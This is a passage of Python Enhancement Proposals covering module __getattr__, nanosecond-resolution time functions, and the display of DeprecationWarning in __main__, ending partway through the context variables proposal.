undocumented dunder names, and allows “breakage without warning”; see [3].)
The performance implications of this PEP are minimal, since __getattr__
is called only for missing attributes.
Some tools that perform module attributes discovery might not expect
__getattr__. This problem is not new however, since it is already possible
to replace a module with a module subclass with overridden __getattr__ and
__dir__, but with this PEP such problems can occur more often.
Discussion
Note that the use of module __getattr__ requires care to keep the referred
objects pickleable. For example, the __name__ attribute of a function
should correspond to the name with which it is accessible via
__getattr__:
def keep_pickleable(func):
func.__name__ = func.__name__.replace('_deprecated_', '')
func.__qualname__ = func.__qualname__.replace('_deprecated_', '')
return func
@keep_pickleable
def _deprecated_old_function(arg, other):
...
One should be also careful to avoid recursion as one would do with
a class level __getattr__.
To access a module global in a way that triggers __getattr__ (for example,
if one wants to use a lazily loaded submodule), one can access it as:
sys.modules[__name__].some_global
or as:
from . import some_global
Note that the latter sets the module attribute, thus __getattr__ will be
called only once.
References
[2]
The reference implementation
(https://github.com/ilevkivskyi/cpython/pull/3/files)
[3]
Reserved classes of identifiers
(https://docs.python.org/3/reference/lexical_analysis.html#reserved-classes-of-identifiers)
Copyright
This document has been placed in the public domain.
| Final | PEP 562 – Module __getattr__ and __dir__ | Standards Track | It is proposed to support __getattr__ and __dir__ function defined
on modules to provide basic customization of module attribute access. |
PEP 564 – Add new time functions with nanosecond resolution
Author:
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
16-Oct-2017
Python-Version:
3.7
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Float type limited to 104 days
Previous rejected PEP
Issues caused by precision loss
Example 1: measure time delta in long-running process
Example 2: compare times with different resolution
CPython enhancements of the last 5 years
Existing Python APIs using nanoseconds as int
Changes
New functions
Unchanged functions
Alternatives and discussion
Sub-nanosecond resolution
Modifying time.time() result type
Different types
Different API
A new module
Annex: Clocks Resolution in Python
Script
Linux
Windows
Analysis
Links
Copyright
Abstract
Add six new “nanosecond” variants of existing functions to the time
module: clock_gettime_ns(), clock_settime_ns(),
monotonic_ns(), perf_counter_ns(), process_time_ns() and
time_ns(). While similar to the existing functions without the
_ns suffix, they provide nanosecond resolution: they return a number of
nanoseconds as a Python int.
The time.time_ns() resolution is 3 times better than the time.time()
resolution on Linux and Windows.
Rationale
Float type limited to 104 days
The clock resolution of desktop and laptop computers is getting closer
to nanosecond resolution.
up to GHz for the CPU TSC clock.
The Python time.time() function returns the current time as a
floating-point number which is usually a 64-bit binary floating-point
number (in the IEEE 754 format).
The problem is that the float type starts to lose nanoseconds after 104
days. Converting from nanoseconds (int) to seconds (float) and
then back to nanoseconds (int) to check if conversions lose
precision:
# no precision loss
>>> x = 2 ** 52 + 1; int(float(x * 1e-9) * 1e9) - x
0
# precision loss! (1 nanosecond)
>>> x = 2 ** 53 + 1; int(float(x * 1e-9) * 1e9) - x
-1
>>> print(datetime.timedelta(seconds=2 ** 53 / 1e9))
104 days, 5:59:59.254741
time.time() returns seconds elapsed since the UNIX epoch: January
1st, 1970. This function hasn’t had nanosecond precision since May 1970
(47 years ago):
>>> import datetime
>>> unix_epoch = datetime.datetime(1970, 1, 1)
>>> print(unix_epoch + datetime.timedelta(seconds=2**53 / 1e9))
1970-04-15 05:59:59.254741
Previous rejected PEP
Five years ago, the PEP 410 proposed a large and complex change in all
Python functions returning time to support nanosecond resolution using
the decimal.Decimal type.
The PEP was rejected for different reasons:
The idea of adding a new optional parameter to change the result type
was rejected. It’s an uncommon (and bad?) programming practice in
Python.
It was not clear if hardware clocks really had a resolution of 1
nanosecond, or if that made sense at the Python level.
The decimal.Decimal type is uncommon in Python and so requires
adapting code to handle it.
Issues caused by precision loss
Example 1: measure time delta in long-running process
A server is running for longer than 104 days. A clock is read before and
after running a function to measure its performance to detect
performance issues at runtime. Such a benchmark only loses precision
because of the float type used by clocks, not because of the clock
resolution.
On Python microbenchmarks, it is common to see function calls taking
less than 100 ns. A difference of a few nanoseconds might become
significant.
Example 2: compare times with different resolution
Two programs “A” and “B” are running on the same system and use the system
clock. The program A reads the system clock with nanosecond resolution
and writes a timestamp with nanosecond resolution. The program B reads
the timestamp with nanosecond resolution, but compares it to the system
clock read with a worse resolution. To simplify the example, let’s say
that B reads the clock with second resolution. In that case, there is a
window of 1 second during which program B can see the timestamp written by A
as “in the future”.
Nowadays, more and more databases and filesystems support storing times
with nanosecond resolution.
Note
This issue was already fixed for file modification time by adding the
st_mtime_ns field to the os.stat() result, and by accepting
nanoseconds in os.utime(). This PEP proposes to generalize the
fix.
CPython enhancements of the last 5 years
Since the PEP 410 was rejected:
The os.stat_result structure got 3 new fields for timestamps as
nanoseconds (Python int): st_atime_ns, st_ctime_ns
and st_mtime_ns.
The PEP 418 was accepted, Python 3.3 got 3 new clocks:
time.monotonic(), time.perf_counter() and
time.process_time().
The CPython private “pytime” C API handling time now uses a new
_PyTime_t type: simple 64-bit signed integer (C int64_t).
The _PyTime_t unit is an implementation detail and not part of the
API. The unit is currently 1 nanosecond.
Existing Python APIs using nanoseconds as int
The os.stat_result structure has 3 fields for timestamps as
nanoseconds (int): st_atime_ns, st_ctime_ns and
st_mtime_ns.
The ns parameter of the os.utime() function accepts a
(atime_ns: int, mtime_ns: int) tuple: nanoseconds.
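For example, these existing APIs already allow copying file timestamps
without any precision loss (the file names below are hypothetical):
import os

st = os.stat("source.txt")
# Propagate access and modification times as exact integer nanoseconds:
os.utime("copy.txt", ns=(st.st_atime_ns, st.st_mtime_ns))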
Changes
New functions
This PEP adds six new functions to the time module:
time.clock_gettime_ns(clock_id)
time.clock_settime_ns(clock_id, time: int)
time.monotonic_ns()
time.perf_counter_ns()
time.process_time_ns()
time.time_ns()
These functions are similar to the version without the _ns suffix,
but return a number of nanoseconds as a Python int.
For example, time.monotonic_ns() == int(time.monotonic() * 1e9) if the
monotonic() value is small enough not to lose precision.
These functions are needed because they may return “large” timestamps,
like time.time() which uses the UNIX epoch as reference, and so their
float-returning variants are likely to lose precision at the nanosecond
resolution.
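For example, a hedged sketch of measuring a short duration with the new
functions, keeping every timestamp as an exact integer:
import time

t0 = time.perf_counter_ns()
total = sum(range(10000))          # arbitrary small workload
dt_ns = time.perf_counter_ns() - t0
print("elapsed: %d ns" % dt_ns)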
Unchanged functions
Since the time.clock() function was deprecated in Python 3.3, no
time.clock_ns() is added.
Python has other time-returning functions. No nanosecond variant is
proposed for these other functions, either because their internal
resolution is greater or equal to 1 us, or because their maximum value
is small enough to not lose precision. For example, the maximum value of
time.clock_getres() should be 1 second.
Examples of unchanged functions:
os module: sched_rr_get_interval(), times(), wait3()
and wait4()
resource module: ru_utime and ru_stime fields of
getrusage()
signal module: getitimer(), setitimer()
time module: clock_getres()
See also the Annex: Clocks Resolution in Python.
A new nanosecond-returning flavor of these functions may be added later
if an operating system exposes new functions providing better resolution.
Alternatives and discussion
Sub-nanosecond resolution
The time.time_ns() API is not theoretically future-proof: if clock
resolutions continue to increase below the nanosecond level, new Python
functions may be needed.
In practice, the 1 nanosecond resolution is currently enough for all
structures returned by all common operating systems functions.
Hardware clocks with a resolution better than 1 nanosecond already
exist. For example, the frequency of a CPU TSC clock is the CPU base
frequency: the resolution is around 0.3 ns for a CPU running at 3
GHz. Users who have access to such hardware and really need
sub-nanosecond resolution can however extend Python for their needs.
Such a rare use case doesn’t justify designing the Python standard library
to support sub-nanosecond resolution.
For the CPython implementation, nanosecond resolution is convenient: the
standard and well supported int64_t type can be used to store a
nanosecond-precise timestamp. It supports a timespan of -292 years
to +292 years. Using the UNIX epoch as reference, it therefore supports
representing times from year 1677 to year 2262:
>>> 1970 - 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
1677.728976954687
>>> 1970 + 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
2262.271023045313
Modifying time.time() result type
It was proposed to modify time.time() to return a different number
type with better precision.
The PEP 410 proposed to return decimal.Decimal which already exists and
supports arbitrary precision, but it was rejected. Apart from
decimal.Decimal, no portable real number type with better precision
is currently available in Python.
Changing the built-in Python float type is out of the scope of this
PEP.
Moreover, changing existing functions to return a new type introduces a
risk of breaking the backward compatibility even if the new type is
designed carefully.
Different types
Many ideas of new types were proposed to support larger or arbitrary
precision: fractions, structures or 2-tuple using integers,
fixed-point number, etc.
See also the PEP 410 for a previous long discussion on other types.
Adding a new type requires more effort to support it, than reusing
the existing int type. The standard library, third party code and
applications would have to be modified to support it.
The Python int type is well known, well supported, easy to
manipulate, and supports all arithmetic operations such as
dt = t2 - t1.
Moreover, taking/returning an integer number of nanoseconds is not a
new concept in Python, as witnessed by os.stat_result and
os.utime(ns=(atime_ns, mtime_ns)).
Note
If the Python float type becomes larger (e.g. decimal128 or
float128), the time.time() precision will increase as well.
Different API
The time.time(ns=False) API was proposed to avoid adding new
functions. It’s an uncommon (and bad?) programming practice in Python to
change the result type depending on a parameter.
Different options were proposed to allow the user to choose the time
resolution. If each Python module uses a different resolution, it can
become difficult to handle different resolutions, instead of just
seconds (time.time() returning float) and nanoseconds
(time.time_ns() returning int). Moreover, as written above,
there is no need for resolution better than 1 nanosecond in practice in
the Python standard library.
A new module
It was proposed to add a new time_ns module containing the following
functions:
time_ns.clock_gettime(clock_id)
time_ns.clock_settime(clock_id, time: int)
time_ns.monotonic()
time_ns.perf_counter()
time_ns.process_time()
time_ns.time()
The first question is whether the time_ns module should expose exactly
the same API (constants, functions, etc.) as the time module. It can be
painful to maintain two flavors of the time module. How are users
supposed to choose between these two modules?
If tomorrow, other nanosecond variants are needed in the os module,
will we have to add a new os_ns module as well? There are functions
related to time in many modules: time, os, signal,
resource, select, etc.
Another idea is to add a time.ns submodule or a nested-namespace to
get the time.ns.time() syntax, but it suffers from the same issues.
Annex: Clocks Resolution in Python
This annex contains the resolution of clocks as measured in Python, and
not the resolution announced by the operating system or the resolution of
the internal structure used by the operating system.
Script
Example of script to measure the smallest difference between two
time.time() and time.time_ns() reads ignoring differences of zero:
import math
import time
LOOPS = 10 ** 6
print("time.time_ns(): %s" % time.time_ns())
print("time.time(): %s" % time.time())
min_dt = [abs(time.time_ns() - time.time_ns())
for _ in range(LOOPS)]
min_dt = min(filter(bool, min_dt))
print("min time_ns() delta: %s ns" % min_dt)
min_dt = [abs(time.time() - time.time())
for _ in range(LOOPS)]
min_dt = min(filter(bool, min_dt))
print("min time() delta: %s ns" % math.ceil(min_dt * 1e9))
Linux
Clocks resolution measured in Python on Fedora 26 (kernel 4.12):
Function                  Resolution
clock()                   1 us
monotonic()               81 ns
monotonic_ns()            84 ns
perf_counter()            82 ns
perf_counter_ns()         84 ns
process_time()            2 ns
process_time_ns()         1 ns
resource.getrusage()      1 us
time()                    239 ns
time_ns()                 84 ns
times().elapsed           10 ms
times().user              10 ms
Notes on resolutions:
clock() frequency is CLOCKS_PER_SECOND which is 1,000,000 Hz
(1 MHz): resolution of 1 us.
times() frequency is os.sysconf("SC_CLK_TCK") (or the HZ
constant) which is equal to 100 Hz: resolution of 10 ms.
resource.getrusage(), os.wait3() and os.wait4() use the
rusage structure. The type of its ru_utime and ru_stime
fields is the timeval structure, which has a
resolution of 1 us.
Windows
Clocks resolution measured in Python on Windows 8.1:
Function             Resolution
monotonic()          15 ms
monotonic_ns()       15 ms
perf_counter()       100 ns
perf_counter_ns()    100 ns
process_time()       15.6 ms
process_time_ns()    15.6 ms
time()               894.1 us
time_ns()            318 us
The frequency of perf_counter() and perf_counter_ns() comes from
QueryPerformanceFrequency(). The frequency is usually 10 MHz: resolution of
100 ns. In old Windows versions, the frequency was sometimes 3,579,545 Hz (3.6
MHz): resolution of 279 ns.
Analysis
The resolution of time.time_ns() is much better than
time.time(): 84 ns (2.8x better) vs 239 ns on Linux and 318 us
(2.8x better) vs 894 us on Windows. The time.time() resolution will
only become larger (worse) as years pass since every day adds
86,400,000,000,000 nanoseconds to the system clock, which increases the
precision loss.
The difference between time.perf_counter(), time.monotonic(),
time.process_time() and their respective nanosecond variants is
not visible in this quick script since the script runs for less than 1
minute, and the uptime of the computer used to run the script was
smaller than 1 week. A significant difference may be seen if uptime
reaches 104 days or more.
resource.getrusage() and times() have a resolution greater or
equal to 1 microsecond, and so don’t need a variant with nanosecond
resolution.
Note
Internally, Python starts the monotonic() and perf_counter()
clocks at zero on some platforms, which indirectly reduces the
precision loss.
Links
bpo-31784: Implementation of the PEP 564
Copyright
This document has been placed in the public domain.
| Final | PEP 564 – Add new time functions with nanosecond resolution | Standards Track | Add six new “nanosecond” variants of existing functions to the time
module: clock_gettime_ns(), clock_settime_ns(),
monotonic_ns(), perf_counter_ns(), process_time_ns() and
time_ns(). While similar to the existing functions without the
_ns suffix, they provide nanosecond resolution: they return a number of
nanoseconds as a Python int. |
PEP 565 – Show DeprecationWarning in __main__
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Final
Type:
Standards Track
Created:
12-Nov-2017
Python-Version:
3.7
Post-History:
12-Nov-2017, 25-Nov-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Specification
New default warnings filter entry
Additional use case for FutureWarning
Recommended filter settings for test runners
Recommended filter settings for interactive shells
Other documentation updates
Reference Implementation
Motivation
Limitations on PEP Scope
References
Copyright
Abstract
In Python 2.7 and Python 3.2, the default warning filters were updated to hide
DeprecationWarning by default, such that deprecation warnings in development
tools that were themselves written in Python (e.g. linters, static analysers,
test runners, code generators), as well as any other applications that merely
happened to be written in Python, wouldn’t be visible to their users unless
those users explicitly opted in to seeing them.
However, this change has had the unfortunate side effect of making
DeprecationWarning markedly less effective at its primary intended purpose:
providing advance notice of breaking changes in APIs (whether in CPython, the
standard library, or in third party libraries) to users of those APIs.
To improve this situation, this PEP proposes a single adjustment to the
default warnings filter: displaying deprecation warnings attributed to the main
module by default.
This change will mean that code entered at the interactive prompt and code in
single file scripts will revert to reporting these warnings by default, while
they will continue to be silenced by default for packaged code distributed as
part of an importable module.
The PEP also proposes a number of small adjustments to the reference
interpreter and standard library documentation to help make the warnings
subsystem more approachable for new Python developers.
As part of the documentation updates, it will be made clearer that the
unittest test runner displays all warnings by default when executing
test cases, and that other test runners are advised to follow that example.
Specification
New default warnings filter entry
The current set of default warnings filters consists of:
ignore::DeprecationWarning
ignore::PendingDeprecationWarning
ignore::ImportWarning
ignore::BytesWarning
ignore::ResourceWarning
The default unittest test runner then uses warnings.catch_warnings() with
warnings.simplefilter('default') to override the default filters while
running test cases.
The change proposed in this PEP is to update the default warning filter list
to be:
default::DeprecationWarning:__main__
ignore::DeprecationWarning
ignore::PendingDeprecationWarning
ignore::ImportWarning
ignore::BytesWarning
ignore::ResourceWarning
This means that in cases where the nominal location of the warning (as
determined by the stacklevel parameter to warnings.warn) is in the
__main__ module, the first occurrence of each DeprecationWarning will once
again be reported.
This change will lead to DeprecationWarning being displayed by default for:
code executed directly at the interactive prompt
code executed directly as part of a single-file script
While continuing to be hidden by default for:
code imported from another module in a zipapp archive’s __main__.py
file
code imported from another module in an executable package’s __main__
submodule
code imported from an executable script wrapper generated at installation time
based on a console_scripts or gui_scripts entry point definition
This means that tool developers that create an installable or executable
artifact (such as a zipapp archive) for distribution to their users
shouldn’t see any change from the status quo, while users of more ad hoc
personal or locally distributed scripts are likely to start seeing relevant
deprecation warnings again (as they did in Python 2.6 and earlier).
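For illustration, a hedged sketch of the effect (the module and function
names are made up):
# somelib.py -- a library deprecating an API; stacklevel=2 attributes
# the warning to the caller.
import warnings

def old_function():
    warnings.warn("old_function() is deprecated", DeprecationWarning,
                  stacklevel=2)

# script.py -- running this file directly attributes the warning to
# __main__, so the new default filter shows it once; the same call made
# from inside another imported module stays hidden by default.
import somelib
somelib.old_function()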
Additional use case for FutureWarning
The standard library documentation will be updated to explicitly recommend the
use of FutureWarning (rather than DeprecationWarning) for backwards
compatibility warnings that are intended to be seen by users of an
application. (This will be in addition to the existing use of FutureWarning
to warn about constructs that will remain valid code in the future,
but will have different semantics).
This will give the following three distinct categories of backwards
compatibility warning, with three different intended audiences:
PendingDeprecationWarning: hidden by default for all code.
The intended audience is Python developers that take an active interest in
ensuring the future compatibility of their software (e.g. professional
Python application developers with specific support obligations).
DeprecationWarning: reported by default for code that runs directly in
the __main__ module (as such code is considered relatively unlikely to
have a dedicated test suite), but hidden by default for code in other modules.
The intended audience is Python developers that are at risk of upgrades to
their dependencies (including upgrades to Python itself) breaking their
software (e.g. developers using Python to script environments where someone
else is in control of the timing of dependency upgrades).
FutureWarning: reported by default for all code.
The intended audience is users of applications written in Python, rather than
other Python developers (e.g. warning about use of a deprecated setting in a
configuration file format).
For library and framework authors that want to ensure their API compatibility
warnings are more reliably seen by their users, the recommendation is to use a
custom warning class that derives from DeprecationWarning in Python 3.7+,
and from FutureWarning in earlier versions.
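A hedged sketch of that recommendation (all names are hypothetical):
import sys
import warnings

# Visible by default in __main__ on Python 3.7+, and visible everywhere
# on earlier versions, where DeprecationWarning is hidden by default.
_base = DeprecationWarning if sys.version_info >= (3, 7) else FutureWarning

class MyLibDeprecationWarning(_base):
    """Compatibility warning for the hypothetical mylib package."""

def old_api():
    warnings.warn("old_api() is deprecated, use new_api() instead",
                  MyLibDeprecationWarning, stacklevel=2)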
Recommended filter settings for test runners
Developers of test runners are advised to implement logic equivalent to the
following when determining their default warnings filters:
if not sys.warnoptions:
warnings.simplefilter("default")
This effectively enables all warnings by default, as if the -Wd command
line option had been passed.
Note that actually enabling BytesWarning in a test suite still requires
passing the -b option to the interpreter at the command line. For implicit
bytes conversion and bytes comparison warnings, the warnings filter machinery
is only used to determine whether they should be printed as warnings or raised
as exceptions - when the command line flag isn’t set, the interpreter doesn’t
even emit the warning in the first place.
Recommended filter settings for interactive shells
Developers of interactive shells are advised to add a filter that enables
DeprecationWarning in the namespace where user code is entered and executed.
If that namespace is __main__ (as it is for the default CPython REPL), then
no changes are needed beyond those in this PEP.
Interactive shell implementations which use a namespace other than
__main__ will need to add their own filter. For example, IPython uses the
following command ([6]) to set up a suitable filter:
warnings.filterwarnings("default", category=DeprecationWarning,
module=self.user_ns.get("__name__"))
Other documentation updates
The current reference documentation for the warnings system is relatively short
on specific examples of possible settings for the -W command line option
or the PYTHONWARNINGS environment variable that achieve particular end
results.
The following improvements are proposed as part of the implementation of this
PEP:
Explicitly list the following entries under the description of the
PYTHONWARNINGS environment variable:
PYTHONWARNINGS=error # Convert to exceptions
PYTHONWARNINGS=always # Warn every time
PYTHONWARNINGS=default # Warn once per call location
PYTHONWARNINGS=module # Warn once per calling module
PYTHONWARNINGS=once # Warn once per Python process
PYTHONWARNINGS=ignore # Never warn
Explicitly list the corresponding short options
(-We, -Wa, -Wd, -Wm, -Wo, -Wi) for each of the
warning actions listed under the -W command line switch documentation
Explicitly list the default filter set in the warnings module
documentation, using the action::category and action::category:module
notation
Explicitly list the following snippet in the warnings.simplefilter
documentation as a recommended approach to turning off all warnings by
default in a Python application while still allowing them to be turned
back on via PYTHONWARNINGS or the -W command line switch:
if not sys.warnoptions:
    warnings.simplefilter("ignore")
None of these are new (they already work in all still supported Python
versions), but they’re not especially obvious given the current structure
of the related documentation.
Reference Implementation
A reference implementation is available in the PR [4] linked from the
related tracker issue for this PEP [5].
As a side-effect of implementing this PEP, the internal warnings filter list
will start allowing the use of plain strings as part of filter definitions (in
addition to the existing use of compiled regular expressions). When present,
the plain strings will be compared for exact matches only. This approach allows
the new default filter to be added during interpreter startup without requiring
early access to the re module.
Motivation
As discussed in [1] and mentioned in [2], Python 2.7 and Python 3.2 changed
the default handling of DeprecationWarning such that:
the warning was hidden by default during normal code execution
the unittest test runner was updated to re-enable it when running tests
The intent was to avoid cases of tooling output like the following:
$ devtool mycode/
/usr/lib/python3.6/site-packages/devtool/cli.py:1: DeprecationWarning: 'async' and 'await' will become reserved keywords in Python 3.7
async = True
... actual tool output ...
Even when devtool is a tool specifically for Python programmers, this is not
a particularly useful warning, as it will be shown on every invocation, even
though the main helpful step an end user can take is to report a bug to the
developers of devtool.
The warning is even less helpful for general purpose developer tools that are
used across more languages than just Python, and almost entirely unhelpful
for applications that simply happen to be written in Python, and aren’t
necessarily intended for a developer audience at all.
However, this change proved to have unintended consequences for the following
audiences:
anyone using a test runner other than the default one built into unittest
(the request for third party test runners to change their default warnings
filters was never made explicitly, so many of them still rely on the
interpreter defaults that are designed to suit deployed applications)
anyone using the default unittest test runner to test their Python code
in a subprocess (since even unittest only adjusts the warnings settings
in the current process)
anyone writing Python code at the interactive prompt or as part of a directly
executed script that didn’t have a Python level test suite at all
In these cases, DeprecationWarning ended up becoming almost entirely
equivalent to PendingDeprecationWarning: it was simply never seen at all.
Limitations on PEP Scope
This PEP exists specifically to explain both the proposed addition to the
default warnings filter for 3.7, and to more clearly articulate the rationale
for the original change to the handling of DeprecationWarning back in Python 2.7
and 3.2.
This PEP does not solve all known problems with the current approach to handling
deprecation warnings. Most notably:
The default unittest test runner does not currently report deprecation
warnings emitted at module import time, as the warnings filter override is only
put in place during test execution, not during test discovery and loading.
The default unittest test runner does not currently report deprecation
warnings in subprocesses, as the warnings filter override is applied directly
to the loaded warnings module, not to the PYTHONWARNINGS environment
variable.
The standard library doesn’t provide a straightforward way to opt-in to seeing
all warnings emitted by a particular dependency prior to upgrading it
(the third-party warn module [3] does provide this, but enabling it
involves monkeypatching the standard library’s warnings module).
When software has been factored out into support modules, but those modules
have little or no automated test coverage, re-enabling deprecation warnings
by default in __main__ isn’t likely to help find API compatibility
problems. Near term, the best currently available answer is to run affected
applications with PYTHONWARNINGS=default::DeprecationWarning or
python -W default::DeprecationWarning and pay attention to their
stderr output. Longer term, this is really a question for researchers
working on static analysis of Python code: how to reliably find usage of
deprecated APIs, and how to infer that an API or parameter is deprecated
based on warnings.warn calls, without actually running either the code
providing the API or the code accessing it.
While these are real problems with the status quo, they’re excluded from
consideration in this PEP because they’re going to require more complex
solutions than a single additional entry in the default warnings filter,
and resolving them at least potentially won’t require going through the PEP
process.
For anyone interested in pursuing them further, the first two would be
unittest module enhancement requests, the third would be a warnings
module enhancement request, while the last would only require a PEP if
inferring API deprecations from their contents was deemed to be an intractable
code analysis problem, and an explicit function and parameter marker syntax in
annotations was proposed instead.
The CPython reference implementation will also include the following related
changes in 3.7:
a new -X dev command line option that combines several developer centric
settings (including -Wd) into one command line flag:
https://github.com/python/cpython/issues/76224
changing the behaviour in debug builds to show more of the warnings that are
off by default in regular interpreter builds: https://github.com/python/cpython/issues/76269
Independently of the proposed changes to the default filters in this PEP,
issue 32229 [7] is a proposal to add a warnings.hide_warnings API to
make it simpler for application developers to hide warnings during normal
operation, while easily making them visible when testing.
References
[1]
stdlib-sig thread proposing the original default filter change
(https://mail.python.org/pipermail/stdlib-sig/2009-November/000789.html)
[2]
Python 2.7 notification of the default warnings filter change
(https://docs.python.org/3/whatsnew/2.7.html#changes-to-the-handling-of-deprecation-warnings)
[3]
Emitting warnings based on the location of the warning itself
(https://pypi.org/project/warn/)
[4]
GitHub PR for PEP 565 implementation
(https://github.com/python/cpython/pull/4458)
[5]
Tracker issue for PEP 565 implementation
(https://github.com/python/cpython/issues/76156)
[6]
IPython’s DeprecationWarning auto-configuration
(https://github.com/ipython/ipython/blob/6.2.x/IPython/core/interactiveshell.py#L619)
[7]
warnings.hide_warnings API proposal
(https://github.com/python/cpython/issues/76410)
First python-dev discussion thread
Second python-dev discussion thread
Copyright
This document has been placed in the public domain.
| Final | PEP 565 – Show DeprecationWarning in __main__ | Standards Track | In Python 2.7 and Python 3.2, the default warning filters were updated to hide
DeprecationWarning by default, such that deprecation warnings in development
tools that were themselves written in Python (e.g. linters, static analysers,
test runners, code generators), as well as any other applications that merely
happened to be written in Python, wouldn’t be visible to their users unless
those users explicitly opted in to seeing them. |
PEP 567 – Context Variables
Author:
Yury Selivanov <yury at edgedb.com>
Status:
Final
Type:
Standards Track
Created:
12-Dec-2017
Python-Version:
3.7
Post-History:
12-Dec-2017, 28-Dec-2017, 16-Jan-2018
Table of Contents
Abstract
API Design and Implementation Revisions
Rationale
Introduction
Specification
contextvars.ContextVar
contextvars.Token
contextvars.Context
asyncio
Implementation
Summary of the New APIs
Python API
C API
Rejected Ideas
Replicating threading.local() interface
Replacing Token with ContextVar.unset()
Having Token.reset() instead of ContextVar.reset()
Making Context objects picklable
Making Context a MutableMapping
Having initial values for ContextVars
Backwards Compatibility
Examples
Converting code that uses threading.local()
Offloading execution to other threads
Reference Implementation
Acceptance
References
Acknowledgments
Copyright
Abstract
This PEP proposes a new contextvars module and a set of new
CPython C APIs to support context variables. This concept is
similar to thread-local storage (TLS), but, unlike TLS, it also allows
correctly keeping track of values per asynchronous task, e.g.
asyncio.Task.
This proposal is a simplified version of PEP 550. The key
difference is that this PEP is concerned only with solving the case
for asynchronous tasks, not for generators. There are no proposed
modifications to any built-in types or to the interpreter.
This proposal is not strictly related to Python Context Managers,
although it does provide a mechanism that can be used by Context
Managers to store their state.
API Design and Implementation Revisions
In Python 3.7.1 the signatures of all context variables
C APIs were changed to use PyObject * pointers instead
of PyContext *, PyContextVar *, and PyContextToken *,
e.g.:
// in 3.7.0:
PyContext *PyContext_New(void);
// in 3.7.1+:
PyObject *PyContext_New(void);
See [6] for more details. The C API section of this PEP was
updated to reflect the change.
Rationale
Thread-local variables are insufficient for asynchronous tasks that
execute concurrently in the same OS thread. Any context manager that
saves and restores a context value using threading.local() will
have its context values bleed to other code unexpectedly when used
in async/await code.
A few examples where having a working context local storage for
asynchronous code is desirable:
Context managers like decimal contexts and numpy.errstate.
Request-related data, such as security tokens and request
data in web applications, language context for gettext, etc.
Profiling, tracing, and logging in large code bases.
Introduction
The PEP proposes a new mechanism for managing context variables.
The key classes involved in this mechanism are contextvars.Context
and contextvars.ContextVar. The PEP also proposes some policies
for using the mechanism around asynchronous tasks.
The proposed mechanism for accessing context variables uses the
ContextVar class. A module (such as decimal) that wishes to
use the new mechanism should (a short sketch follows this list):
declare a module-global variable holding a ContextVar to
serve as a key;
access the current value via the get() method on the
key variable;
modify the current value via the set() method on the
key variable.
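A minimal sketch of the pattern just described, loosely modeled on how a
module like decimal could use the new API (the function names are made up):
from contextvars import ContextVar

precision = ContextVar('precision', default=28)    # module-global key

def set_precision(value):
    precision.set(value)                            # set the current value

def current_precision():
    return precision.get()                          # read the current value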
The notion of “current value” deserves special consideration:
different asynchronous tasks that exist and execute concurrently
may have different values for the same key. This idea is well known
from thread-local storage but in this case the locality of the value is
not necessarily bound to a thread. Instead, there is the notion of the
“current Context” which is stored in thread-local storage.
Manipulation of the current context is the responsibility of the
task framework, e.g. asyncio.
A Context is a mapping of ContextVar objects to their values.
The Context itself exposes the abc.Mapping interface
(not abc.MutableMapping!), so it cannot be modified directly.
To set a new value for a context variable in a Context object,
the user needs to:
make the Context object “current” using the Context.run()
method;
use ContextVar.set() to set a new value for the context
variable.
The ContextVar.get() method looks for the variable in the current
Context object using self as a key.
It is not possible to get a direct reference to the current Context
object, but it is possible to obtain a shallow copy of it using the
contextvars.copy_context() function. This ensures that the
caller of Context.run() is the sole owner of its Context
object.
Specification
A new standard library module contextvars is added with the
following APIs:
The copy_context() -> Context function is used to get a copy of
the current Context object for the current OS thread.
The ContextVar class to declare and access context variables.
The Context class encapsulates context state. Every OS thread
stores a reference to its current Context instance.
It is not possible to control that reference directly.
Instead, the Context.run(callable, *args, **kwargs) method is
used to run Python code in another context.
contextvars.ContextVar
The ContextVar class has the following constructor signature:
ContextVar(name, *, default=_NO_DEFAULT). The name parameter
is used for introspection and debug purposes, and is exposed
as a read-only ContextVar.name attribute. The default
parameter is optional. Example:
# Declare a context variable 'var' with the default value 42.
var = ContextVar('var', default=42)
(The _NO_DEFAULT is an internal sentinel object used to
detect if the default value was provided.)
ContextVar.get(default=_NO_DEFAULT) returns a value for
the context variable for the current Context:
# Get the value of `var`.
var.get()
If there is no value for the variable in the current context,
ContextVar.get() will:
return the value of the default argument of the get() method,
if provided; or
return the default value for the context variable, if provided; or
raise a LookupError.
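A small sketch of the three fallbacks (the variable names are
illustrative):

# No value set and no defaults anywhere:
missing = ContextVar('missing')
# missing.get()          would raise LookupError
missing.get('fallback')  # -> 'fallback' (method-level default)

# A variable with a ContextVar-level default:
var = ContextVar('var', default=42)
var.get()                # -> 42 (variable default)
var.get(0)               # -> 0  (method default wins over the variable default)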
ContextVar.set(value) -> Token is used to set a new value for
the context variable in the current Context:
# Set the variable 'var' to 1 in the current context.
var.set(1)
ContextVar.reset(token) is used to reset the variable in the
current context to the value it had before the set() operation
that created the token (or to remove the variable if it was
not set):
# Assume: var.get(None) is None

# Set 'var' to 1:
token = var.set(1)
try:
    assert var.get() == 1
finally:
    var.reset(token)

# After reset: var.get(None) is None,
# i.e. 'var' was removed from the current context.
The ContextVar.reset() method raises:
a ValueError if it is called with a token object created
by another variable;
a ValueError if the current Context object does not match
the one where the token object was created;
a RuntimeError if the token object has already been used once
to reset the variable.
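A short sketch of the first and last of these error conditions (the
variable names are illustrative):

a = ContextVar('a')
b = ContextVar('b')

token = a.set(1)

# b.reset(token)   would raise ValueError: the token belongs to 'a'

a.reset(token)
# a.reset(token)   would raise RuntimeError: token already used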
contextvars.Token
contextvars.Token is an opaque object that should be used to
restore the ContextVar to its previous value, or to remove it from
the context if the variable was not set before. It can be created
only by calling ContextVar.set().
For debug and introspection purposes it has:
a read-only attribute Token.var pointing to the variable
that created the token;
a read-only attribute Token.old_value set to the value the
variable had before the set() call, or to Token.MISSING
if the variable wasn’t set before.
contextvars.Context
A Context object is a mapping of context variables to values.
Context() creates an empty context. To get a copy of the current
Context for the current OS thread, use the
contextvars.copy_context() function:

ctx = contextvars.copy_context()

To run Python code in some Context, use the Context.run()
method:
ctx.run(function)
Any changes to any context variables that function causes will
be contained in the ctx context:
var = ContextVar('var')
var.set('spam')

def main():
    # 'var' was set to 'spam' before
    # calling 'copy_context()' and 'ctx.run(main)', so:
